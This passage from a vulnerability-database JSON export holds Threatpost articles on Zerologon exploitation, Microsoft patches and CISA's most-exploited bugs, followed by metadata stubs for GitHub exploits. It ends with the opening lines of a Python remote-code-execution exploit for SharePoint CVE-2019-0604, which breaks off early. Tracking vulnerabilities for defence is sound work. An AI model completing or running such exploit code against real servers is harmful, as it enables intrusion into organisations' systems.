actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nMicrosoft\u2019s alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:20:11", "description": "Microsoft has released patches for 129 security bugs in its September Patch Tuesday update. These include 23 critical flaws, 105 that are important in severity and one moderate bug. Fortunately, none are publicly known or under active exploitation, Microsoft said.\n\nThe most severe issue in the bunch is [CVE-2020-16875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875>), according to researchers. This is a memory-corruption problem in Microsoft Exchange that allows remote code-execution (RCE) just by sending an email to a target. Running arbitrary code could grant attackers the access they need to create new accounts, access, modify or remove data, and install programs.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cThis patch corrects a vulnerability that allows an attacker to execute code at SYSTEM by sending a specially crafted email to an affected Exchange Server,\u201d wrote Dustin Childs, researcher at Trend Micro\u2019s Zero-Day Initiative (ZDI), in [an analysis](<https://www.zerodayinitiative.com/blog/2020/9/8/the-september-2020-security-update-review>) on Tuesday. \u201cThat is about the worst-case scenario for Exchange servers. We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We\u2019ll likely see this one in the wild soon. This should be your top priority.\u201d\n\nJustin Knapp, product marketing manager at Automox, added that while this vulnerability only affects Exchange Server versions 2016 and 2019, \u201cthe broad use of Microsoft Exchange across business users and a high CVSS score of 9.1 indicates that this patch should be prioritized high on the list.\u201d\n\nAnother critical RCE vulnerability that should be prioritized for patching is [CVE-2020-1210](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1210>), which exists in SharePoint due to a failure to check an application package\u2019s source markup. It rates 9.9 out of 10 on the CVSS severity scale.\n\n\u201cTo exploit this flaw, an attacker would need to be able to upload a SharePoint application package to a vulnerable SharePoint site,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cThis vulnerability is reminiscent of a similar SharePoint remote code-execution flaw, [CVE-2019-0604](<https://threatpost.com/un-hack-microsoft-sharepoint-flaw/152378/#:~:text=Hackers%20breached%20the%20United%20Nations,SharePoint%20vulnerability%2C%20according%20to%20reports.&text=This%20remote%20code%2Dexecution%20vulnerability,did%20not%20update%20its%20systems.>), that has been exploited in the wild by threat actors since at least April 2019.\u201d\n\nThere are a total of seven RCE bugs being fixed in SharePoint. Only one, CVE-2020-1460, requires authentication.\n\nKnapp flagged another critical RCE vulnerability (rated 8.4 on the CvSS scale) in the Windows Graphic Device Interface ([CVE-2020-1285](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1285>)). It arises because of the way the GDI handles objects in memory, providing both web-based and file-sharing attack scenarios that could introduce multiple vectors for an attacker to gain control of a system, he said.\n\n\u201cIn the web-based attack scenario, an attacker would need to craft a website designed to exploit the vulnerability and then convince users to view the website,\u201d Knapp noted. \u201cSince there\u2019s no way to force users to view the attacker-controlled content, the attacker would need to convince users to take action, typically by getting them to open an email attachment or click a link. In the file-sharing scenario, the attacker would need to convince users to open a specially crafted file designed to exploit the vulnerability. Given the extensive list of Windows and Windows Server versions impacted and the lack of a workaround or mitigation, this is a vulnerability that should be patched immediately.\u201d\n\nSeptember\u2019s slew of patches also features several other RCE bugs, including one in the Microsoft Windows Codecs Library ([CVE-2020-1129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1129>), with an 8.8 CvSS rating), which is used by multiple applications and can therefore affect a wide range of programs. An attacker could execute code on a victim machine by convincing someone to view a weaponized video clip.\n\n\u201c[This] could allow code execution if an affected system views a specially crafted image,\u201d Childs explained. \u201cThe specific flaw exists within the parsing of HEVC streams. A crafted HEVC stream in a video file can trigger an overflow of a fixed-length stack-based buffer.\u201d\n\nAnother critical RCE problem exists in the Microsoft Component Object Model (COM) for Windows ([CVE-2020-0922](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0922>)), which is a platform-independent system for creating binary software components that can interact with each other. Like the previous bug, there are likely multiple applications that could be impacted by the flaw if they use COM. It rates 8.8 on the CvSS scale.\n\n\u201cThis patch corrects a vulnerability that would allow an attacker to execute code on an affected system if they can convince a user to open a specially crafted file or lure the target to a website hosting malicious JavaScript,\u201d Childs explained.\n\nMeanwhile, [CVE-2020-16874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16874>) is a critical RCE vulnerability within Visual Studio, rating 7.8. An attacker could successfully exploit this vulnerability by convincing a user to open a specially crafted file using an affected version of the software.\n\n\u201cIf the compromised user is logged in with admin rights, the attacker could take control of the affected system and gain the ability to install programs; view, change, or delete data; or create new accounts with full user rights,\u201d Automox\u2019 Knapp said. \u201cThe vulnerability exists in multiple versions of Visual Studio dating back to 2012.\u201d\n\nAmong the other bugs of note, Childs also highlighted [CVE-2020-0951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0951>), an important-rated security feature bypass bug in Windows Defender.\n\n\u201cAn attacker with administrative privileges on a local machine could connect to a PowerShell session and send commands to execute arbitrary code,\u201d Childs said. \u201cThis behavior should be blocked by WDAC, which does make this an interesting bypass. However, what\u2019s really interesting is that this is getting patched at all. Vulnerabilities that require administrative access to exploit typically do not get patches. I\u2019m curious about what makes this one different.\u201d\n\nSeptember\u2019s Patch Tuesday release continues a trend of high-volume security updates. The patches are for a wide range of products, including Microsoft Windows, Edge (both EdgeHTML-based and Chromium-based), ChakraCore, Internet Explorer (IE), SQL Server, Office and Office Services and Web Apps, Microsoft Dynamics, Visual Studio, Exchange Server, ASP.NET, OneDrive and Azure DevOps.\n\n\u201cThat brings us to seven straight months of 110+ CVEs,\u201d said Childs. \u201cIt also brings the yearly total close to 1,000. It certainly seems like this volume is the new normal for Microsoft patches.\u201d\n\nOrganizations are struggling to keep up, Knapp noted.\n\n\u201cAs many organizations continue to struggle to support the ongoing distribution of remote workers, Microsoft continues to pile on the updates,\u201d he said. \u201cFinding an efficient method for rolling out these patches has become even more imperative as companies begin to abandon the idea of a short-term fix and shift operations to embrace remote work as part of a lasting, long-term progression of how organizations operate moving forward\u2026.We\u2019re beginning to realize the negative outcomes of the lenient security measures put in place to quickly adapt to a decentralized workforce and it\u2019s become more important than ever to establish patching policies that can securely support remote endpoints for the foreseeable future.\u201d\n\nMeanwhile, [Adobe fixed](<https://threatpost.com/critical-adobe-flaws-attackers-javascript-browsers/159026/>) five critical cross-site scripting (XSS) flaws in Experience Manager as part of its regularly scheduled patches on Tuesday. It also addressed flaws in Adobe Framemaker, its document-processor designed for writing and editing large or complex documents; and InDesign, its desktop publishing and typesetting software application.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-08T20:40:46", "type": "threatpost", "title": "Microsoft's Patch Tuesday Packed with Critical RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-0688", "CVE-2020-0922", "CVE-2020-0951", "CVE-2020-1129", "CVE-2020-1210", "CVE-2020-1285", "CVE-2020-1460", "CVE-2020-16874", "CVE-2020-16875", "CVE-2020-5135"], "modified": "2020-09-08T20:40:46", "id": "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "href": "https://threatpost.com/microsofts-patch-tuesday-critical-rce-bugs/159044/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-09T01:48:18", "description": "\n\n# \u4e00\u3001\u89e3\u8bf4k8gege\u7684cve-2019-060...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-10T02:39:57", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2022-08-08T02:46:06", "id": "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T21:17:12", "description": "# CVE-2019-0604\ncve-2019-0604 SharePoint RCE ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-26T15:00:29", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2022-07-27T11:48:50", "id": "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-03T01:10:48", "description": "# Weaponized CVE-2019-0604\n\nAutomated Exploit Tool to Maximize C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-22T12:11:22", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2022-05-02T20:32:42", "id": "38A11E23-686C-5C12-93FA-4A82D0E04202", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2023-06-13T15:01:19", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T00:00:00", "type": "zdt", "title": "Microsoft SharePoint - Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2020-02-11T00:00:00", "id": "1337DAY-ID-33951", "href": "https://0day.today/exploit/description/33951", "sourceData": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport sys\nfrom xml.sax.saxutils import escape\nfrom lxml import html\nimport codecs\nimport readline\nfrom clint.arguments import Args\nimport signal\n\ndef serialize_command(cmd):\n total = \"\"\n for x in cmd:\n a = codecs.encode(x,\"utf-16be\")\n b = codecs.encode(a,\"hex\").decode('ascii')\n total += b[::-1]\n return total\n\ndef deserialize_command(cmd):\n length = 